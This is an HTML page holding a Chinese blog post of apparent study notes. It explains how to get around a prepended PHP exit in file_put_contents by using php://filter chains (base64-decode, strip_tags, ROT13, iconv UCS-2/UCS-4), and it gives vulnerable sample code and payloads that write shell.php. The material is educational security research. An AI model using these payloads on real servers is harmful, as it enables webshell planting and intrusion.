<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.8.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.8.0" type="image/png" sizes="32x32"><meta name="description" content="file_put_contents利用技巧(php:&#x2F;&#x2F;filter协议）       1234&lt;?php$content &#x3D; &amp;#x27;&lt;?php exit; ?&gt;&amp;#x27;;$content .&#x3D; $_POST[&amp;#x27;txt&amp;#x27;];file_put_contents($_POST[&amp;#x27;fil">
<meta property="og:type" content="article">
<meta property="og:title" content="File_put_contents利用技巧(php:&#x2F;&#x2F;filter协议）">
<meta property="og:url" content="https://qingchuana.github.io/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/index.html">
<meta property="og:site_name" content="晴川&#39;s Blog">
<meta property="og:description" content="file_put_contents利用技巧(php:&#x2F;&#x2F;filter协议）       1234&lt;?php$content &#x3D; &amp;#x27;&lt;?php exit; ?&gt;&amp;#x27;;$content .&#x3D; $_POST[&amp;#x27;txt&amp;#x27;];file_put_contents($_POST[&amp;#x27;fil">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://qingchuana.github.io/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan/1/hexoblog/source/image/1964477-20200406235335043-1930261389.png">
<meta property="og:image" content="https://qingchuana.github.io/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan/1/hexoblog/source/image/1964477-20200406234627327-1601681134.png">
<meta property="og:image" content="https://qingchuana.github.io/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan/1/hexoblog/source/image/1964477-20200406234831984-1876664653.png">
<meta property="og:image" content="https://qingchuana.github.io/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan/1/hexoblog/source/image/1964477-20200407000202377-1581427195.png">
<meta property="og:image" content="https://qingchuana.github.io/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan/1/hexoblog/source/image/1964477-20200407103428847-745843372.png">
<meta property="og:image" content="https://qingchuana.github.io/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan/1/hexoblog/source/image/1964477-20200407103501626-1447360416.png">
<meta property="og:image" content="https://qingchuana.github.io/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan/1/hexoblog/source/image/1964477-20200407105517997-451500709.png">
<meta property="og:image" content="https://qingchuana.github.io/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan/1/hexoblog/source/image/1964477-20200407111602416-1849632067.png">
<meta property="article:published_time" content="2023-10-18T16:00:00.000Z">
<meta property="article:modified_time" content="2023-11-12T09:21:40.213Z">
<meta property="article:author" content="Qingchuan">
<meta property="article:tag" content="学习笔记">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://qingchuana.github.io/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan/1/hexoblog/source/image/1964477-20200406235335043-1930261389.png"><title>File_put_contents利用技巧(php://filter协议） | 晴川's Blog</title><link ref="canonical" href="https://qingchuana.github.io/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.8.0"><link rel="stylesheet" href="css/custom.css"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.3.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Hello Stun</div><div class="header-banner-info__subtitle">An elegant theme for Hexo</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">File_put_contents利用技巧(php://filter协议）</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2023-10-19</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2023-11-12</span></span></div></header><div class="post-body">
        <h1 id="file-put-contents利用技巧-php-filter协议）">
          <a href="#file-put-contents利用技巧-php-filter协议）" class="heading-link"><i class="fas fa-link"></i></a><a href="#file-put-contents利用技巧-php-filter协议）" class="headerlink" title="file_put_contents利用技巧(php:&#x2F;&#x2F;filter协议）"></a>file_put_contents利用技巧(php:&#x2F;&#x2F;filter协议）</h1>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$content = &#x27;&lt;?php exit; ?&gt;&#x27;;</span><br><span class="line">$content .= $_POST[&#x27;txt&#x27;];</span><br><span class="line">file_put_contents($_POST[&#x27;filename&#x27;], $content);</span><br></pre></td></tr></table></div></figure>

<p><code>$content</code>在开头增加了exit过程，导致即使我们成功写入一句话，也执行不了。幸运的是，这里的<code>$_POST[&#39;filename&#39;]</code>是可以控制协议的，我们即可使用 php:&#x2F;&#x2F;filter协议来施展魔法。</p>
<p><strong>#方法一、base64编码</strong></p>
<p>使用php:&#x2F;&#x2F;filter流的base64-decode方法，将<code>$content</code>解码，利用php base64_decode函数特性去除“死亡exit”。</p>
<p>众所周知，base64编码中只包含64个可打印字符（A-Z a-z 0-9 + &#x2F;）’&#x3D;’补位，而PHP在解码base64时，遇到不在其中的字符时，将会跳过这些字符，仅将合法字符组成一个新的字符串进行解码。</p>
<p>所以，当<code>$content</code>被加上了<code>&lt;?php exit; ?&gt;</code>以后，我们可以使用 php:&#x2F;&#x2F;filter&#x2F;write&#x3D;convert.base64-decode  来首先对其解码。在解码的过程中，字符&lt;、?、;、&gt;、空格等一共有7个字符不符合base64编码的字符范围将被忽略，所以最终被解码的字符仅有“phpexit”和我们传入的其他字符。</p>
<p>“phpexit”一共7个字符，<strong>因为base64算法解码时是4个byte一组</strong>，所以给他增加1个“a”一共8个字符。这样，”phpexita”被正常解码，而后面我们传入的webshell的base64内容也被正常解码。结果就是<code>&lt;?php exit; ?&gt;</code>没有了。</p>
<p>最终效果：</p>
<p><a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/blog/1964477/202004/1964477-20200406235335043-1930261389.png"><img src="/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan\1\hexoblog\source\image\1964477-20200406235335043-1930261389.png"></a></p>
<p><strong>#方法二、利用字符串操作方法+base64组合拳</strong></p>
<p>除了使用base64特性的方法外，我们还可以利用php:&#x2F;&#x2F;filter字符串处理方法来去除“死亡exit”。我们观察一下，这个<code>&lt;?php exit; ?&gt;</code>实际上是什么？</p>
<p>实际上是一个XML标签，既然是XML标签，我们就可以利用strip_tags函数去除它，而php:&#x2F;&#x2F;filter刚好是支持这个方法的。</p>
<p>编写如下测试代码即可查看 php:&#x2F;&#x2F;filter&#x2F;read&#x3D;string.strip_tags&#x2F;resource&#x3D;php:&#x2F;&#x2F;input 的效果：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo readfile(&#x27;php://filter/read=string.strip_tags/resource=php://input&#x27;);</span><br></pre></td></tr></table></div></figure>

<p><a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/blog/1964477/202004/1964477-20200406234627327-1601681134.png"><img src="/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan\1\hexoblog\source\image\1964477-20200406234627327-1601681134.png"></a></p>
<p>可见，<code>&lt;?php exit; ?&gt;</code>被去除了。但回到上面的题目，我们最终的目的是写入一个webshell，而写入的webshell也是php代码，如果使用strip_tags同样会被去除。</p>
<p>万幸的是，php:&#x2F;&#x2F;filter允许使用多个过滤器，我们可以先将webshell用base64编码。在调用完成strip_tags后再进行base64-decode。“死亡exit”在第一步被去除，而webshell在第二步被还原。</p>
<p>最终效果：</p>
<p><a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/blog/1964477/202004/1964477-20200406234831984-1876664653.png"><img src="/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan\1\hexoblog\source\image\1964477-20200406234831984-1876664653.png"></a></p>
<p><strong>#方法三、ROT13编码</strong></p>
<p>原理和上面类似，核心是将“死亡exit”去除。<code>&lt;?php exit; ?&gt;</code>在经过rot13编码后会变成<code>&lt;?cuc rkvg; ?&gt;</code>，在PHP不开启short_open_tag时，php不认识这个字符串，当然也就不会执行了：</p>
<p><a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/blog/1964477/202004/1964477-20200407000202377-1581427195.png"><img src="/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan\1\hexoblog\source\image\1964477-20200407000202377-1581427195.png"></a></p>
<p> <strong>Round 2</strong> </p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a = $_POST[&#x27;txt&#x27;];</span><br><span class="line">file_put_contents($a,&quot;&lt;?php exit();&quot;.$a);</span><br></pre></td></tr></table></div></figure>

<p>这种是前后两个变量相同，假设$a可控情况。</p>
<p>这种相同变量的构造方式和不同变量的构造方式思路是大差不差的，都是需要干掉<code>&lt;?php exit();</code>，只不过构造起来相对更复杂一些。</p>
<p><strong>#方法一、base64编码</strong></p>
<p>根据前面介绍的不同变量的构造方法，很容易拓展到相同的变量，同样利用php:&#x2F;&#x2F;filter来构造，反正后面是写入的内容，只要在后面解码的时候把shell解码出来，不需要的东西解码成乱码即可，而Base64构造的话，例如</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$a=php://filter/write=convert.base64-decode|PD9waHAgcGhwaW5mbygpOz8+/resource=shell.php</span><br><span class="line"></span><br><span class="line">（    &lt;?php phpinfo();?&gt;    base64编码    PD9waHAgcGhwaW5mbygpOz8+      ）</span><br></pre></td></tr></table></div></figure>

<p>构造的shell可以放在过滤器的位置和文件名位置都可以（其他编码有时候会有空格什么的乱码，文件名不一定好用），php:&#x2F;&#x2F;filter面对不可用的规则（一串base64）是报个Warning，绕后跳过继续执行的（不会退出），所以按理说这样构造是“很完美”的。我们看下base-decode哪些字符👇</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php//filter/write=convertbase64decodePD9waHAgcGhwaW5mbygpOz8+/resource=shellphp</span><br></pre></td></tr></table></div></figure>

<p>而默认情况下base64编码是以 &#x3D; 作为结尾的，所以正常解码的时候到了 &#x3D; 就解码结束了，即使我们构造payload的时候不用<code>write=</code>，但是在最后获取文件名的时候<code>resource=</code>中的 &#x3D; 过不掉，所以导致过滤器解码失败，从而报错…</p>
<p>这里用base64编码我还没找到好的方法，待补充…</p>
<p><strong>#方法二、ROT13</strong></p>
<p>rot13编码就不存在base64的问题，所以和前面base64构造的思路一样</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$a = php://filter/write=string.rot13|&lt;?cuc cucvasb();?&gt;/resource=shell.php</span><br></pre></td></tr></table></div></figure>

<p><a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/blog/1964477/202004/1964477-20200407103428847-745843372.png"><img src="/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan\1\hexoblog\source\image\1964477-20200407103428847-745843372.png"></a><a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/blog/1964477/202004/1964477-20200407103501626-1447360416.png"><img src="/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan\1\hexoblog\source\image\1964477-20200407103501626-1447360416.png"></a></p>
<p> 和前面提到的一样，这种方法是需要服务器没有开启短标签的时候才可以使用（默认情况是没开启的：php.ini中的short_open_tag）</p>
<p><strong>#方法三、iconv字符编码转换</strong></p>
<p>通过字符转换把<code>&lt;?php exit();</code>转成不能解析的，这里采用的是UCS-2或者UCS-4编码方式，而我们构造的转成可正常解析的</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#echo iconv(&quot;UCS-2LE&quot;,&quot;UCS-2BE&quot;,&#x27;&lt;?php phpinfo();?&gt;&#x27;);</span><br><span class="line">?&lt;hp phpipfn(o;)&gt;?</span><br></pre></td></tr></table></div></figure>

<p>这里用的是UCS-2，当然我们也可以用UCS-4</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo iconv(&quot;UCS-4LE&quot;,&quot;UCS-4BE&quot;,&#x27;aa&lt;?php phpinfo();?&gt;&#x27;);</span><br><span class="line">?&lt;aa phpiphp(ofn&gt;?;)</span><br></pre></td></tr></table></div></figure>

<p>通过UCS-2或者UCS-4的方式，对目标字符串进行2&#x2F;4位一反转，也就是说构造的需要是UCS-2或UCS-4中2或者4的倍数，不然不能进行反转，那我们就可以利用这种过滤器进行编码转换绕过了，构造payload</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$a=&#x27;php://filter/convert.iconv.UCS-2LE.UCS-2BE|?&lt;hp phpipfn(o;)&gt;?/resource=shell.php&#x27;;</span><br><span class="line"></span><br><span class="line">**or**</span><br><span class="line"></span><br><span class="line">$a=&#x27;php://filter/convert.iconv.UCS-4LE.UCS-4BE|xxx?&lt;aa phpiphp(ofn&gt;?;)/resource=shell.php&#x27;;</span><br><span class="line">#由于是4位一反转，所以需要保证?&lt;aa phpiphp(ofn&gt;?;)之前字符个数是4的倍数,所以补充了 xxx</span><br></pre></td></tr></table></div></figure>

<p> <a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/blog/1964477/202004/1964477-20200407105517997-451500709.png"><img src="/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan\1\hexoblog\source\image\1964477-20200407105517997-451500709.png"></a></p>
<p><strong>#方法四、iconv字符编码转换+ROT13编码组合拳</strong></p>
<p>和前后不同的变量的利用一样，相同变量一样可以使用组合拳，原因前面描述过了，就不赘述，这里就用UCS-2和rot13举一个例子吧</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$a = &#x27;php://filter/write=convert.iconv.UCS-2LE.UCS-2BE|string.rot13|x?&lt;uc cucvcsa(b;)&gt;?/resource=shell.php&#x27;</span><br><span class="line">#先将 &lt;?php phpinfo(); ?&gt; 进行rot13得到&lt;?cuc cucvasb();?&gt;</span><br><span class="line">#再对&lt;?cuc cucvasb();?&gt;进行UCS2编码转换得到?&lt;uc cucvcsa(b;)&gt;?</span><br><span class="line">#最后x 补位</span><br><span class="line">#最终得到x?&lt;uc cucvcsa(b;)&gt;?</span><br></pre></td></tr></table></div></figure>

<p><a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/blog/1964477/202004/1964477-20200407111602416-1849632067.png"><img src="/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/AAwangzhan\1\hexoblog\source\image\1964477-20200407111602416-1849632067.png"></a></p>
<p> 为何不用string.strip_tags呢？因为rot13转换的同样会被strip_tags方法给删除了，而UCS-2或UCS-4构造的也同样会被strip_tags方法给删除，这里需要找其他的编码方式进行构造。</p>
<p>参考：</p>
<p><span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html">https://www.leavesongs.com/PENETRATION/php-filter-magic.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p><span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/BXBe0sviIpjzQb49fk1TCg">https://mp.weixin.qq.com/s/BXBe0sviIpjzQb49fk1TCg</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="https://qingchuana.github.io">Qingchuan</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="https://qingchuana.github.io/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/">https://qingchuana.github.io/2023/10/19/file_put_contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7(phpfilter%E5%8D%8F%E8%AE%AE%EF%BC%89/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://qingchuana.github.io/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">学习笔记</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2023/10/19/2023%E5%B9%B4SWPU%20NSS%20%E7%A7%8B%E5%AD%A3%E6%8B%9B%E6%96%B0%E8%B5%9B%20(%E6%A0%A1%E5%A4%96%E8%B5%9B%E9%81%93)/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">2023年SWPU NSS 秋季招新赛 (校外赛道)</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2023/10/18/%E9%A6%99%E5%B1%B1%E6%9D%AF/"><span class="paginator-prev__text">香山杯</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#file-put-contents%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7-php-filter%E5%8D%8F%E8%AE%AE%EF%BC%89"><span class="toc-number">1.</span> <span class="toc-text">
          file_put_contents利用技巧(php:&#x2F;&#x2F;filter协议）</span></a></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/icons/stun-logo.svg" alt="avatar"></div><p class="sidebar-ov-author__text">Hello Stun</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">36</div><div class="sidebar-ov-state-item__name">归档</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2023</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>Qingchuan</span></div><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 强力驱动</span><span> v6.3.0</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.8.0</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.8.0"></script><script src="/js/stun-boot.js?v=2.8.0"></script><script src="/js/scroll.js?v=2.8.0"></script><script src="/js/header.js?v=2.8.0"></script><script src="/js/sidebar.js?v=2.8.0"></script><script async>window.onload=function(){var a=document.createElement('script'),b=document.getElementsByTagName('script')[0];a.type='text/javascript',a.async=!0,a.src='/sw-register.js?v='+Date.now(),b.parentNode.insertBefore(a,b)};</script></body></html>